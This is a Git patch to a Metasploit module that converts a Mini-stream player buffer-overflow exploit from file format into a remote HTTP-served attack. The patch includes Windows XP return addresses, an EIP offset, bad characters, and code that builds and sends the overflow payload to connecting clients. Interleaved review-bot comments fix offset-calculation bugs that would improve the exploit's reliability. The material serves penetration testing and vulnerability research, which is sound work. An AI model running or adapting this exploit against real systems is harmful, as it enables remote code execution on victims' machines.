From 3d6f631780456bee97cf10863421eba1f3d40716 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Fri, 4 Nov 2011 08:20:43 +0000 Subject: [PATCH] Upgrade mini_stream as a remote module. Account for all variables that affect the offset to EIP. Also digital1 = Ron. git-svn-id: file:///home/svn/framework3/trunk@14155 4d416f70-5f16-0410-b530-b9f4589650da --- .../{fileformat => misc}/mini_stream.rb | 53 +++++++++++++------ 1 file changed, 36 insertions(+), 17 deletions(-) rename modules/exploits/windows/{fileformat => misc}/mini_stream.rb (56%) diff --git a/modules/exploits/windows/fileformat/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb similarity index 56% rename from modules/exploits/windows/fileformat/mini_stream.rb rename to modules/exploits/windows/misc/mini_stream.rb index baae0a16e7..92aa023948 100644 --- a/modules/exploits/windows/fileformat/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'CORELAN Security Team ', - 'Ron Henry ', # Return address update - 'dijital1', + 'Ron Henry ', # dijital1; Return address update ], 'Version' => '$Revision$', 'References' => 
@@ -40,19 +39,30 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 3500, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll + [ + 'Windows XP SP3 ENG', + { + 'Ret' => 0x7e429353, # 0x7e429353 JMP ESP - USER32.dll + 'Offset' => 17417 + } + ], + [ + 'Windows XP SP2 ENG', + { + 'Ret' => 0x7c941eed, # 0x7c941eed JMP ESP - SHELL32.dll + 'Offset' => 17417 + } + ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 25 2009', 
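Review bot: The new `'Offset' => 17417` entries in both targets carry no explanation of what the number measures, while the neighbouring `'Ret'` values are annotated with the gadget and module they come from. Since `on_request_uri` later subtracts the length of the `"host:port/"` prefix from this value, a reader cannot tell from the target table whether 17417 is the raw distance to the saved return address or already accounts for some fixed URL bytes, nor why both targets share the same value. Annotate each entry, e.g. `'Offset' => 17417 # padding to saved EIP; on_request_uri subtracts the "host:port/" prefix length`, adjusting the wording to whatever the value was actually measured against. The `initialize` method that holds this table starts before and ends after the hunk.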
@@ -60,21 +70,30 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']), + OptString.new('URIPATH', [ true, 'The URI to use for this exploit', 'msf.pls']) ], self.class) end - def exploit - sploit = rand_text_alphanumeric(17403) - sploit << [target.ret].pack('V') - sploit << "CAFE" * 8 - sploit << payload.encoded + def on_request_uri(cli, request) + # Calculate the correct offset + host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + host << ":#{datastore['SRVPORT']}/" + offset = target['Offset'] - host.length - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") + # Construct our buffer + sploit = rand_text_alpha(offset) + sploit << [target.ret].pack('V') + sploit << make_nops(32) + sploit << @p + + print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'}) + end + + def exploit + @p = payload.encoded + super end end -
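Review bot: `host << ":#{datastore['SRVPORT']}/"` appends in place, and when SRVHOST is anything other than 0.0.0.0 the ternary on the previous line hands back the very string object stored in the datastore, so each request served mutates `datastore['SRVHOST']` (it grows by another `:port/` suffix per hit) and the offset computed for the next client drifts. Build a fresh string instead: `host = "#{host}:#{datastore['SRVPORT']}/"`. Separately, URIPATH is registered as a user-settable option but its length is not part of the subtraction; if the player overflows on the full URL rather than on the host portion alone (the hunk does not show what is parsed, so this is inferred), a non-default URIPATH would shift the return address, and either `datastore['URIPATH'].length` should be subtracted as well or the option should be documented as fixed-length. The status message also has a typo, `malicous` for `malicious`.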